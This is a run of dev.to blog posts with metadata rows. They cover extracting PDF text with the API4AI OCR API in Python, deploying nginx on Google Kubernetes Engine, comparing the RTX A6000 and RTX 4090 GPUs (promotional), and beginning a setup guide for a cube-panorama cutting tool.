- **Finance**: Financial institutions apply OCR to process invoices, receipts, and financial statements. OCR facilitates automated data entry, minimizes manual errors, and accelerates financial transactions and reporting.

- **Education**: Schools and universities use OCR to digitize textbooks, research papers, and historical documents. This enhances the accessibility and searchability of educational materials, aiding in research and learning.

- **Retail**: In the retail sector, OCR is used for inventory management, processing customer feedback forms, and extracting data from receipts for loyalty programs.

## Advantages of Using OCR for Text Extraction from PDFs

Utilizing OCR for extracting text from PDFs provides numerous benefits:

- **Efficiency**: OCR automates the text extraction process, significantly cutting down the time and effort needed for manual transcription. This is particularly advantageous for handling multi-page PDFs that contain substantial amounts of data.

- **Accuracy**: Modern OCR technologies, driven by advanced algorithms and machine learning, offer high accuracy in text recognition. This ensures the extracted text is dependable, minimizing the need for extensive manual corrections.

- **Searchability**: By converting scanned documents and images into searchable text, OCR enhances the ability to quickly find specific information within a PDF. This is especially valuable for legal and academic research, where swift access to relevant data is critical.

- **Data Accessibility**: Digitizing documents with OCR makes information more accessible and easier to share. This is crucial for industries like healthcare, where rapid access to patient records can enhance the quality of care.

- **Cost Savings**: Automating text extraction with OCR reduces expenses associated with manual data entry and physical document storage. Organizations can allocate resources more efficiently and focus on higher-value tasks.

In this tutorial, we will harness the power of OCR technology using the [API4AI OCR API](https://api4.ai/apis/ocr) to extract text from multi-page PDFs. This will demonstrate how you can leverage OCR to enhance your document processing workflows and unlock the full potential of your digital data.

# Overview of Existing OCR Solutions

## Comparison of Leading OCR APIs

Several widely-used OCR APIs are available, each offering unique features and advantages. In this section, we will compare four prominent OCR APIs: Google Cloud Vision OCR, Amazon Textract, Tesseract OCR, and API4AI OCR API.

![Google Cloud Vision](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/93mxcigam5abdr9pw5qv.png)

**Google Cloud Vision OCR**

[Google Cloud Vision OCR](https://cloud.google.com/vision/docs/ocr) is a robust and adaptable OCR service offered by Google Cloud. It delivers high accuracy in text recognition and supports numerous languages. The API can detect text in both images and PDFs, making it ideal for various applications across multiple industries. Additionally, it offers extra features such as image labeling, face detection, and landmark recognition.

![AWS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/smkrd2mb9sc9ubs9nzwt.png)

**Amazon Textract**

[Amazon Textract](https://aws.amazon.com/textract/) is an OCR service provided by Amazon Web Services (AWS), specifically designed to extract text and data from scanned documents and images. It not only recognizes text but also comprehends the document's structure, including tables and forms.
This capability makes it especially valuable for applications requiring detailed data extraction, such as invoice processing and form digitization.

![Tesseract OCR](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gpgbsff7np5h9jixx1f5.png)

**Tesseract OCR**

[Tesseract OCR](https://github.com/tesseract-ocr/tesseract) is an open-source OCR engine, originally developed by HP and later sponsored by Google, known for its accuracy and wide language support. It is particularly favored by developers for its flexibility and the absence of licensing fees, allowing it to be integrated into various applications. However, it demands more effort to set up and utilize compared to cloud-based OCR services.

![API4AI OCR API](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xf1v9zrspesxosru7qz6.png)

**API4AI OCR API**

The [API4AI OCR API](https://api4.ai/apis/ocr) is a relatively new yet powerful OCR solution. It offers high accuracy in text recognition and supports several languages. API4AI emphasizes ease of integration, providing simple API endpoints that can be seamlessly incorporated into various applications. It is designed to process both images and PDFs, making it a versatile option for diverse OCR tasks.

## Key Features and Differences

**Accuracy**

- **Google Cloud Vision OCR**: Renowned for its exceptional accuracy and reliability in text recognition.
- **Amazon Textract**: Delivers outstanding accuracy, particularly in extracting structured data from forms and tables.
- **Tesseract OCR**: Offers high accuracy, especially when properly configured and trained with suitable data.
- **API4AI OCR API**: Provides competitive accuracy, making it suitable for a variety of OCR applications.

**Supported Languages**

- **Google Cloud Vision OCR**: Supports more than 50 languages, making it highly versatile for language recognition.
- **Amazon Textract**: Covers an expanding list of languages, with a focus on major global languages.
- **Tesseract OCR**: Supports over 100 languages, including many that are less commonly used.
- **API4AI OCR API**: Supports more than 70 languages, ensuring wide-ranging applicability.

**Ease of Integration**

- **Google Cloud Vision OCR**: Features extensive documentation and SDKs, simplifying integration into diverse programming environments.
- **Amazon Textract**: Comes with thorough documentation and seamless integration with other AWS services, enhancing usability within the AWS ecosystem.
- **Tesseract OCR**: Demands more manual setup and configuration, yet provides flexibility for developers seeking custom solutions.
- **API4AI OCR API**: Emphasizes ease of use with straightforward API endpoints and clear documentation, ensuring simple integration.

## Why We Selected API4AI OCR API for This Tutorial

We have chosen the API4AI OCR API for this tutorial for several compelling reasons:

- **High Accuracy**: The API4AI OCR API delivers reliable and precise text recognition, which is crucial for effectively extracting text from multi-page PDFs.
- **Ease of Integration**: Designed with user-friendliness in mind, the API4AI OCR API features simple and intuitive API endpoints. This facilitates easy integration into our tutorial's workflow without requiring extensive setup or configuration.
- **Supported Languages**: Supporting multiple languages, the API4AI OCR API ensures that our tutorial can address a diverse audience with various language needs.
- **Versatility**: Capable of handling both images and PDFs, the API4AI OCR API is a versatile choice for our tutorial, allowing us to demonstrate text extraction from different document types.

By utilizing the API4AI OCR API, we aim to provide a clear and practical example of how to extract text from multi-page PDFs, highlighting the capabilities and ease of use of this robust OCR solution.

# Preparing Your Environment

## Overview of API4AI OCR API

The API4AI OCR API is a powerful, user-friendly OCR solution designed to extract text from images and PDFs. It provides high accuracy, supports multiple languages, and integrates easily into various applications. Accessible via simple HTTP requests, this API allows developers to implement OCR functionality without requiring extensive setup or configuration.

In this tutorial, we will use the API4AI OCR API to demonstrate efficient text extraction from multi-page PDFs. We will walk you through subscribing to the full-featured version of the API on the RapidAPI platform. However, you can also test the API using the demo endpoint (as detailed in the [documentation](https://api4.ai/docs/ocr)) without subscribing to RapidAPI. If you opt for this approach, simply skip the RapidAPI subscription steps and slightly adjust the provided code samples.

## Subscribing to the API on Rapid API

To use the API4AI OCR API, you need to subscribe to it via Rapid API, a marketplace offering access to thousands of APIs, including the API4AI OCR API. Follow these steps to subscribe:

1. **Create a Rapid API Account**: If you don't have an account, sign up at the [Rapid API Hub](https://rapidapi.com/hub).
2. **Search for API4AI OCR API**: Use the search bar to locate the API4AI OCR API. Alternatively, you can navigate directly to the [API4AI OCR API page](https://rapidapi.com/api4ai-api4ai-default/api/ocr43).
3. **Subscribe to the API**: On the API4AI OCR API page, choose a pricing plan that meets your requirements and subscribe to the API. Many APIs, including the API4AI OCR API, offer a free tier with limited usage, ideal for testing and development purposes.

## Obtaining Your API Key

After subscribing to the API4AI OCR API, you'll need to acquire your API key to authenticate your requests. Follow these steps to obtain your API key:

- **Go to Your Rapid API Dashboard**: Log in and navigate to your Rapid API [dashboard](https://rapidapi.com/developer/dashboard).
- **Access the 'My Apps' Section**: Expand one of your applications and click on the 'Authorization' tab.
- **Copy an Authorization Key**: You'll see a list of authorization keys. Copy one of these keys, and you're ready to go! You now have your API4AI OCR API key.

## Making a Basic API Call

With your API key ready, you can now perform a basic API call to the API4AI OCR API to verify that everything is configured properly. Execute the following command:

```bash
curl -X 'POST' 'https://ocr43.p.rapidapi.com/v1/results' \
-H 'X-RapidAPI-Key: ...' \
-F "url=https://storage.googleapis.com/api4ai-static/samples/ocr-1.png" ``` The expected output should be: ```bash {"results":[{"status":{"code":"ok","message":"Success"},"name":"https://storage.googleapis.com/api4ai-static/samples/ocr-1.png","md5":"7009ed0064efa278ed529d382e968dcb","width":333,"height":241,"entities":[{"kind":"objects","name":"text","objects":[{"box":[0.04804804804804805,0.12863070539419086,0.8588588588588588,0.7302904564315352],"entities":[{"kind":"text","name":"text","text":"EAST NORTH\nBUSINESS\nINTERSTATE\n40 85"}]}]}]}]} ``` By completing these steps, you have successfully prepared your environment, subscribed to the API4AI OCR API, acquired your API key, and performed a basic API call. You are now equipped to tackle more advanced tasks, such as extracting text from multi-page PDFs, which we will explore in the following section. #Handling Multi-Page PDFs ## Challenges with Multi-Page PDFs Working with multi-page PDFs presents several challenges that are not encountered with single-page documents. These challenges include: - **File Size and Complexity**: Multi-page PDFs can be large and intricate, making efficient processing more difficult. Handling such files requires careful memory management and may necessitate splitting the PDF into smaller, more manageable segments. - **Consistency Across Pages**: Achieving uniform OCR accuracy across all pages can be challenging, as different pages may have varying layouts, fonts, and image quality. This requires robust preprocessing and error handling to maintain consistency. - **Combining Extracted Text**: Once text is extracted from each page, it must be combined coherently. This involves managing page breaks and ensuring the correct sequence of the text. ## Sample Code to Iterate Through Pages and Extract Text Here is a detailed guide and example code to process multi-page PDFs using the API4AI OCR API. **Parsing Command-Line Arguments** The script will accept and manage command-line arguments using the **argparse** library. The --api-key **api-key** argument represents your API key from Rapid API. Below is the implementation of the necessary function in Python. ```python def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser() parser.add_argument('--api-key', help='Rapid API key.', required=True) parser.add_argument('pdf', type=Path, help='Path to a PDF.') return parser.parse_args() ``` **Parsing PDF with OCR API** Next, we will create a function to process each page of the PDF using the API4AI OCR API. Note that for multi-page PDFs, each page will yield a separate **results** in the results field. ```python def parse_pdf(pdf_path: Path, api_key: str) -&gt; list: """ Extract text from a pdf. Returns list of strings, representing pdf pages. """ # We strongly recommend you use exponential backoff. error_statuses = (408, 409, 429, 500, 502, 503, 504) s = requests.Session() retries = Retry(backoff_factor=1.5, status_forcelist=error_statuses) s.mount('https://', HTTPAdapter(max_retries=retries)) url = f'{API_URL}/v1/results' with pdf_path.open('rb') as f: api_res = s.post(url, files={'image': f}, headers={'X-RapidAPI-Key': api_key}, timeout=20) api_res_json = api_res.json() # Handle processing failure. if (api_res.status_code != 200 or api_res_json['results'][0]['status']['code'] == 'failure'): print('Image processing failed.') sys.exit(1) # Each page is a different result. 
    pages = [result['entities'][0]['objects'][0]['entities'][0]['text']
             for result in api_res_json['results']]
    return pages
```

**Primary Function**

The primary function will coordinate the entire workflow, from loading the PDF to extracting text from each individual page.

```python
def main():
    """Script entry function."""
    args = parse_args()
    pages = parse_pdf(args.pdf, args.api_key)
    for i, page in enumerate(pages):
        print(f'Text on page {i + 1}:\n{page}\n')


if __name__ == '__main__':
    main()
```

**Full Python Script**

Below is the full Python script, integrating all the previously discussed components:

```python
"""
Parse PDF using OCR API.

Run script:
`python3 main.py --api-key <RAPID_API_KEY> <PATH_TO_PDF>`
"""
import argparse
import sys
from pathlib import Path

import requests
from requests.adapters import Retry, HTTPAdapter

# Base host of the OCR API; endpoint paths are appended below.
API_URL = 'https://ocr43.p.rapidapi.com'


def parse_args():
    """Parse command line arguments."""
    parser = argparse.ArgumentParser()
    # Get your token at https://rapidapi.com/api4ai-api4ai-default/api/ocr43/pricing
    parser.add_argument('--api-key', help='Rapid API key.', required=True)
    parser.add_argument('pdf', type=Path, help='Path to a PDF.')
    return parser.parse_args()


def parse_pdf(pdf_path: Path, api_key: str) -> list:
    """
    Extract text from a pdf.

    Returns list of strings, representing pdf pages.
    """
    # We strongly recommend you use exponential backoff.
    error_statuses = (408, 409, 429, 500, 502, 503, 504)
    s = requests.Session()
    retries = Retry(backoff_factor=1.5, status_forcelist=error_statuses)
    s.mount('https://', HTTPAdapter(max_retries=retries))
    url = f'{API_URL}/v1/results'
    with pdf_path.open('rb') as f:
        api_res = s.post(url, files={'image': f},
                         headers={'X-RapidAPI-Key': api_key}, timeout=20)
    api_res_json = api_res.json()

    # Handle processing failure.
    if (api_res.status_code != 200
            or api_res_json['results'][0]['status']['code'] == 'failure'):
        print('Image processing failed.')
        sys.exit(1)

    # Each page is a different result.
    pages = [result['entities'][0]['objects'][0]['entities'][0]['text']
             for result in api_res_json['results']]
    return pages


def main():
    """Script entry function."""
    args = parse_args()
    pages = parse_pdf(args.pdf, args.api_key)
    for i, page in enumerate(pages):
        print(f'Text on page {i + 1}:\n{page}\n')


if __name__ == '__main__':
    main()
```

**Testing the Script**

Let's test the script using a sample two-page PDF file. To execute the script, run: **python3 main.py --api-key YOUR_API_KEY path/to/pdf**. The expected output should be:

```bash
Text on page 1:
A Simple PDF File This is a small demonstration .pdf file - just for use in the Virtual Mechanics tutorials. More text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Boring, zzzzz. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Even more. Continued on page 2 ...

Text on page 2:
Simple PDF File 2 ...continued from page 1. Y et more text. And more text. And more text. And more text. And more text. And more text. And more text. And more text. Oh, how boring typing this stuff. But not as boring as watching paint dry. And more text. And more text. And more text. And more text. Boring. More, a little more text. The end, and just as well.
```

By following these steps, you can efficiently manage multi-page PDFs and extract text using the API4AI OCR API. This approach enables you to handle large and intricate PDF documents effectively, harnessing the capabilities of OCR technology.

## Advanced Topics and Additional Features

Real-world applications may involve additional requirements, including (but not limited to):

- **Handling PDFs with Complex Layouts**: PDFs often contain intricate layouts, such as tables, images, and columns, which can challenge OCR processes.
- **Using OCR for Specific Languages and Character Sets**: For OCR to work effectively with specific languages, you might need to configure the API to recognize the target language. This enhances accuracy, particularly for languages with unique characters or writing styles.
- **Batch Processing Multiple PDFs**: Processing several PDFs in a batch can save time and increase efficiency (a short sketch of this appears at the very end of this post).
- **Storing and Managing Extracted Text Data**: After extracting text from PDFs, an efficient method for storing and managing the data is essential.

If you have any questions or encounter issues, please feel free to [reach out to us directly](https://api4.ai/get-started).

# Conclusion

In this tutorial, we've outlined the crucial steps and considerations for extracting text from multi-page PDFs using the API4AI OCR API. Here's a quick summary of the key points:

- **Understanding OCR and Its Applications**: We began with a brief history of OCR technology, examined its applications in various industries, and discussed the benefits of using OCR for text extraction from PDFs.
- **Overview of Existing OCR Solutions**: We compared popular OCR APIs, including Google Cloud Vision OCR, Amazon Textract, Tesseract OCR, and API4AI OCR API, focusing on their main features and differences, and explained why we chose API4AI OCR API for this tutorial.
- **Preparing Your Environment**: We walked through the steps to subscribe to the API4AI OCR API on Rapid API, obtain your API key, and make a basic API call to confirm proper setup.
- **Handling Multi-Page PDFs**: We explored the challenges of working with multi-page PDFs and provided example code for iterating through pages and extracting text. This included parsing command-line arguments, processing each page of the PDF, and combining the extracted text into a coherent output.

## Final Tips and Best Practices for Using OCR APIs

- **Select the Appropriate OCR API**: Choose an OCR API that meets your requirements in terms of accuracy, language support, ease of integration, and cost. The API4AI OCR API is a great option due to its balance of accuracy and user-friendliness.
- **Implement Robust Error Handling**: Ensure your scripts can handle API call failures, network issues, and unexpected document formats gracefully by incorporating solid error handling mechanisms.
- **Optimize for Performance**: When processing large multi-page PDFs or handling multiple files in batches, optimize your code for performance. This may include techniques such as parallel processing or efficient memory management.
- **Protect Your API Keys**: Keep your API keys secure and avoid hardcoding them in your scripts. Use environment variables or secure vaults to store sensitive information safely.

## Encouragement to Explore Further and Experiment with OCR Projects

The field of OCR presents limitless opportunities for innovation and efficiency. We encourage you to delve deeper and experiment with OCR projects tailored to your unique requirements.
Whether you're automating document processing in a business setting, digitizing historical records for research, or creating accessible digital content, OCR technology can greatly enhance your workflows. Feel free to explore advanced features, such as handling complex document layouts, utilizing OCR for various languages and character sets, and integrating OCR with other AI and machine learning technologies. The more you experiment, the more you'll uncover the transformative potential of OCR. Thank you for following this tutorial. We hope it has provided you with a strong foundation to start extracting text from multi-page PDFs using the API4AI OCR API. Happy coding and best of luck with your OCR projects! [More stories about Cloud, AI and APIs for Image Processing](https://api4.ai/blog)
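P.S. To illustrate the batch-processing idea from the advanced topics above, here's a minimal sketch that reuses this tutorial's `parse_pdf` across a folder of PDFs. It assumes the script above was saved as `main.py`, and the `pdfs` folder name and `YOUR_RAPID_API_KEY` placeholder are stand-ins for your own values:

```python
from pathlib import Path

from main import parse_pdf  # the script from this tutorial

API_KEY = 'YOUR_RAPID_API_KEY'  # placeholder: your Rapid API key

for pdf in sorted(Path('pdfs').glob('*.pdf')):
    # parse_pdf returns one string per page of the document
    pages = parse_pdf(pdf, API_KEY)
    print(f'{pdf.name}: extracted {len(pages)} page(s)')
```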
taranamurtuzova
1,920,821
Practicing with Google Cloud Platform - Google Kubernetes Engine to deploy nginx
Introduction This article provides simple step-by-step instructions for those who are new...
28,047
2024-07-17T03:00:00
https://howtodevez.blogspot.com/2024/04/practicing-with-google-cloud-platform-google-kubernetes-engine-to-deploy-nginx.html
kubernetes, gcp, beginners, devops
Introduction
------------

This article provides simple step-by-step instructions for those who are new to **Google Cloud Platform (GCP)** and **Google Kubernetes Engine (GKE)**. I'll guide you through using **GKE** to create clusters and deploy **nginx**. The instructions below will primarily use **gcloud** and **kubectl** to initialize the cluster, which is more convenient than manual management on the **Google Cloud** interface.

![Google Cloud Kubernetes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6xhbp3xcgwfqnp8dw6z2.png)

Prerequisites
-------------

First, you need to prepare the following:

* Have a **GCP** account with permission to use Cloud services. If you're new, you'll get a **$300 free trial** to use for **90 days**.
* Create a new **GCP** project.
* Enable **Compute Engine** and **Kubernetes Engine** services.

Install Google Cloud SDK and kubectl
------------------------------------

For this installation step, refer to the [**GCP** documentation](https://cloud.google.com/sdk/docs/install#installation_instructions) for instructions tailored to your operating system. Once installed, execute the following commands to check if **gcloud** and **kubectl** are installed:

```sh
gcloud version
kubectl version
```

If you see the version output, we'll proceed to the next part.

![gcloud version](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/egwqupuq3ttsdzij6bnv.png)

Initialize **Google Cloud SDK** authentication
----------------------------------------------

Please execute the following command to configure **Google Cloud**:

```sh
gcloud init
```

Next, you'll follow the instructions to log in with your **Google Cloud** account. Then, you'll be prompted to configure the default **Compute Region and Zone**. It's important to note that different regions have different pricing for machine types. You can check the prices on the Create VM instance UI. However, you should still choose the region that best suits your needs to ensure the best network speed.

![Google Cloud Console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o13xna17kxb3as07m2tp.png)

Creating GKE Cluster
--------------------

To create a **GKE Cluster**, simply execute the following command:

```sh
# gcloud container clusters create {cluster name}
gcloud container clusters create k8s-cluster
```

If you want to specify specific details for the cluster, use the following command:

```sh
# gcloud container clusters create {cluster name} \
# --project {project id} \
# --zone {zone id} \
# --machine-type {machine type id} \
# --num-nodes {number of node}
gcloud container clusters create k8s-cluster \
--project cluster-1 \
--zone asia-southeast1-a \
--machine-type e2-micro \
--num-nodes 1
```

Here, I'm using the machine type **e2-micro**, which has a simple configuration and a relatively cheap price, sufficient for you to follow along with this article.
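Creating the cluster this way also writes its credentials into your local kubeconfig, so **kubectl** is ready to use right away. If you ever need to re-fetch those credentials (for example, from another machine), you can run the following; the zone here assumes the `asia-southeast1-a` example above:

```sh
# re-fetch cluster credentials so kubectl can reach the cluster
gcloud container clusters get-credentials k8s-cluster --zone asia-southeast1-a
```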
After successfully initializing the cluster, execute the following command to list the instances currently available:

```sh
gcloud compute instances list
```

Use kubectl to deploy nginx
---------------------------

Execute the following command to deploy **nginx** using a **Docker image**:

```sh
# kubectl create deployment {service name} --image={image name} --replicas={number}
kubectl create deployment service-name --image=nginx --replicas=1
```

![Deploy service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f4dm2w9ssnrhv07yqo0w.png)

To check the pods currently available, execute the following command:

```sh
kubectl get pods
```

Next, I'll create a **LoadBalancer Service** to access the **Pod** from outside the **Cluster** as follows:

```sh
# kubectl expose deployment {service name} --name={load balance service name} --type=LoadBalancer --port={port load balancer service} --target-port={port pod}
kubectl expose deployment service-name --name=service-name-lb --type=LoadBalancer --port=80 --target-port=80
```

![Expose service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f7v4tau4e3cdjna3qh0i.png)

To check the **LoadBalancer service**, use the following command:

```sh
kubectl get svc
# or
kubectl get svc service-name-lb
```

![Service info](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0bwbsjggo9rwitwf0icf.png)

If you run this command too early, the **EXTERNAL-IP** column will be **\<pending\>**. Please wait a few minutes until you see an IP address in the **EXTERNAL-IP** column to access it. The result will be as follows:

![Nginx has been successfully deployed](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/504pmlrshr9onf4pydx1.png)

Cleaning Up Resources
---------------------

After completing the steps outlined in the article, delete the resources and services as follows to avoid any unwanted costs:

```sh
# remove LoadBalancer service
kubectl delete service service-name-lb
# remove GKE cluster
gcloud container clusters delete k8s-cluster
```

![Result after deleted service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6fwjjplgp8o5hq8ismap.png)

To check if the resources and services have been deleted, you can use the commands I provided earlier or directly check on the **Google Cloud Console**.
```sh kubectl get svc gcloud compute instances list ``` **_If you have any suggestions or questions regarding the content of the article, please don't hesitate to leave a comment below!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/practicing-with-google-cloud-platform-google-kubernetes-engine-to-deploy-nginx.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,920,845
RTX A6000 vs RTX 4090: Which GPU Is Right for You?
Introduction Nvidia leads with its RTX series, featuring the top-notch GPUs RTX A6000 and...
0
2024-07-12T21:30:00
https://blogs.novita.ai/rtx-a6000-vs-rtx-4090-which-gpu-is-right-for-you/
webdev, gpu
## **Introduction**

Nvidia leads the field with its RTX series, topped by the RTX A6000 for professionals and the RTX 4090 for gamers. This blog breaks down their key features, performance, build quality, and energy efficiency to help you make an informed choice between the RTX A6000 and RTX 4090. Let's dive in!

## **Overview of RTX A6000 and RTX 4090**

The RTX A6000 and RTX 4090 are top-tier Nvidia graphics cards designed for different purposes. The RTX A6000 is ideal for professionals in fields such as architecture and animation, offering specialized features for heavy-duty tasks on high-end workstations. The RTX 4090, on the other hand, is aimed at gaming enthusiasts, providing top-tier performance and stunning visuals even during intense gameplay.

Explore the unique features of each GPU, the RTX A6000 and RTX 4090, to find the perfect match for your needs.

**Key features of RTX A6000**

- a powerful graphics card for engineering and media work
- 48 GB memory, ideal for big tasks
- high bandwidth of 768.0 GB/s for fast data movement
- handles calculations swiftly with 10752 CUDA cores
- boosts rendering speed, number crunching, and AI tasks
- supports ray tracing and Tensor Cores for AI jobs
- connects to multiple displays easily with four DisplayPort outputs

**Key features of RTX 4090**

- a feature set built to enhance gaming
- 24 GB GDDR6X memory
- a bandwidth of 1,008 GB/s
- 16384 CUDA cores for significant computing power
- high frame rates and seamless gameplay in the latest AAA titles
- supports DLSS for better visual quality
- real-time ray tracing technology

## **Performance Comparison**

Both cards are strong at what they were built for. Professionals often choose the RTX A6000 for work because it renders complex graphics quickly and helps get jobs done faster. If you're into video games, the RTX 4090 is the go-to card, running the newest titles with crisp visuals and smooth motion.

**Benchmarking results overview**

The benchmarks show that the RTX A6000 is not designed for gaming but rather for professional applications where rendering and computational performance are paramount. The same results highlight the superior gaming performance of the RTX 4090; if you are a gamer wanting high frame rates, it is the better choice.

**Gaming performance analysis**

In gaming, the RTX 4090 clearly stands out because of its strong hardware and feature set. It can handle all the big new games at high quality settings and fast speeds, keeping gameplay smooth. In top games like Cyberpunk 2077, Assassin's Creed Odyssey, and Battlefield 5, this graphics card consistently delivers more FPS (frames per second) than the RTX A6000. The RTX 4090's gaming edge boils down to more CUDA cores, faster memory, and technologies like DLSS and real-time ray tracing, which make games look great while running smoothly.

## **Design and Build Quality**

A graphics card's design and build quality are essential to how well it performs and how long it lasts. The RTX A6000 and the RTX 4090 both feature strong builds and top-notch components, ensuring they run smoothly and reliably.
**Cooling technologies compared**

The RTX A6000 and the RTX 4090 use different approaches to stay cool, making sure they work well without overheating.

_**The RTX A6000:**_ With its dual-slot setup, the RTX A6000 packs a big heatsink along with several heat pipes. This design dissipates heat effectively, ensuring that the GPU's temperature stays manageable even under heavy load. Because it fits into two slots, it works with many types of workstations, which makes adding it to your system pretty straightforward.

_**The RTX 4090:**_ For better airflow and cooling during intense gaming sessions, the RTX 4090 has a triple-slot configuration featuring an advanced cooling fan, which boosts heat removal and lowers the chances of overheating. Note that this bigger size means you'll need enough room in your computer case.

**Physical dimensions and aesthetics**

_**The RTX A6000:**_ The RTX A6000 sticks to a dual-slot design, which means it can fit into lots of different workstations without any trouble. It's 267 mm long and takes up 2 slots, so putting it in most systems should be pretty straightforward. Plus, this card has a neat and professional look that matches Nvidia's Quadro series style.

_**The RTX 4090:**_ With the RTX 4090, though, things are a bit bigger: its triple-slot design needs more room inside your PC case. It stretches out to 304 mm long and needs space for three slots in total. The look of this card is modern and cool, showing off Nvidia's focus on gaming vibes.

When choosing between the RTX A6000 and RTX 4090, consider their form factors and appearance to make sure the card fits and suits your setup. The RTX A6000 leans towards professional applications under the Quadro name, while the RTX 4090 embraces gaming aesthetics.

## **Price and Value for Money**

The price difference between the two GPUs reflects their target markets and intended uses. While the RTX A6000 caters to professionals needing high computational power, the RTX 4090 provides a balance between gaming and deep learning tasks. Ultimately, the value depends on how you prioritize performance, features, and budget constraints. Choose wisely based on your needs and usage scenarios.

**Current market prices**

Both the RTX A6000 and the RTX 4090 carry hefty price tags, and prices differ across countries and regions. It's interesting to note that Nvidia places the two cards in different series: the Quadro-class series includes models like the RTX A6000 meant for professional use (think big work projects needing lots of computing power), while the GeForce line-up, including the RTX 4090, is all about giving gamers an awesome experience with top-notch performance. The RTX A6000 launched in October 2020, roughly two years before the RTX 4090, which makes the 4090 the newer option on the market.

**Cost per frame analysis**

The idea behind cost per frame is pretty straightforward: it tells you how much cash goes into every single frame a game shows. This helps figure out if spending on a graphics card gives good bang for your buck and if it's really worth shelling out for. With its top-notch gaming chops, the RTX 4090 cranks out high frames per second in tough games, so despite its substantial price, its cost per frame works out lower than that of the RTX A6000. On another note, the RTX A6000 shines when put to work on professional tasks and heavy-duty applications.
Its cost per frame might not look as appealing compared to GPUs made mainly for gaming, but it stands as a solid investment for pros needing elite-level performance.

## **Another choice for you**

Why not make your decision after actually trying each of these two GPUs? Novita AI GPU Pods gives you that possibility!

Novita AI GPU Pods offers a robust platform for developers to harness the capabilities of high-performance GPUs. By choosing Novita AI GPU Pods, developers can efficiently scale their resources and focus on their core development activities without the hassle of managing physical hardware. Join the Novita AI Community to discuss!

## **Conclusion**

When choosing between the RTX A6000 and the RTX 4090, consider your specific needs and preferences. Both GPUs offer impressive features and performance tailored to different user requirements. Whether you prioritize gaming, professional projects, or budget constraints, evaluating their power efficiency, design, pricing, and user feedback is crucial. Additionally, consider your usage patterns, such as display quality and required connections, to facilitate the decision-making process. Ultimately, the goal is to strike a balance between top-notch performance, cost-effectiveness, and compatibility with your intended use.

## **Frequently Asked Questions**

**Which GPU is better for long-term use?**

For gaming or demanding work, the RTX 4090 is ideal. If saving money is a priority and top performance isn't crucial, go for the RTX A6000.

**Can either GPU be used for 4K video editing?**

Both the RTX A6000 and RTX 4090 excel at this task, with the RTX 4090 ahead of the RTX A6000 thanks to its faster performance and rendering speed, owing to more CUDA cores and quicker clock speeds.

**What's the Radeon equivalent of the RTX 4090?**

The RTX 4090 has no equal in performance or price. The closest competitor is the 7900 XTX, which is more of a 4080 competitor.

**What are the real benefits of the RTX A6000?**

The real benefit of the A6000, besides the certified drivers and such, is being able to keep more stuff in VRAM and thus get a smoother experience.

> Originally published at [Novita AI](https://novita.ai/blogs/rtx-a6000-vs-rtx-4090-which-gpu-is-right-for-you/).

> [Novita AI](https://novita.ai), the one-stop platform for limitless creativity that gives you access to 100+ APIs. From image generation and language processing to audio enhancement and video manipulation, cheap pay-as-you-go, it frees you from GPU maintenance hassles while building your own products. Try it for free.
novita_ai
1,920,871
Generate cube image panorama
Introduction In today's digital age, high-quality panorama images are becoming...
0
2024-07-17T04:41:19
https://dev.to/nmthangdn2000/cut-cube-image-panorama-3gmn
threejs, panorama, view360
# Introduction

In today's digital age, high-quality panorama images are becoming increasingly popular in fields like tourism, real estate, and interior design. However, the manual process of cropping cube panorama images can be time-consuming and prone to errors, which may affect the image quality when uploaded to the web. To address this challenge, an automatic cube panorama cropping tool is an optimal solution. This tool not only saves time but also ensures image optimization, leading to faster load times and a better user experience. In this blog post, we will explore how to use this tool to quickly and efficiently crop cube panorama images.

# How to Install and Set Up the Tool

In this section, I will provide a step-by-step guide on how to install and set up the automatic cubemap image cutting tool: downloading the software, installing its dependencies, and configuring it for optimal performance.

I'd also like to mention that I display tiled panorama images using the [photo-sphere-viewer.js cubemap-tiles adapter](https://photo-sphere-viewer.js.org/guide/adapters/cubemap-tiles.html#panorama-options).

### Requirements

- Before you begin, make sure you have installed [ImageMagick](https://imagemagick.org/index.php), a powerful tool for image processing.
- [Node](https://nodejs.org/)

### Clone the Repository

To get started, clone the repository to your machine by running the following command:

```bash
$ git clone https://github.com/nmthangdn2000/panorama-app.git
```

### Installation

After cloning, you need to install the necessary dependencies. Just run the following commands:

```bash
$ cd panorama-app
$ yarn
```

This will quickly set up your working environment.

### Build the Project

Build your project with:

```bash
$ yarn build
```

### Run the Project

Start your project with:

```bash
$ yarn start
```

# How to Use the Tool

In this section, I will guide you through the process of using the automatic cubemap image cutting tool. This includes uploading your panorama images, configuring the settings for optimal results, and viewing the final output.

### The first step is to select the storage location for the entire project.

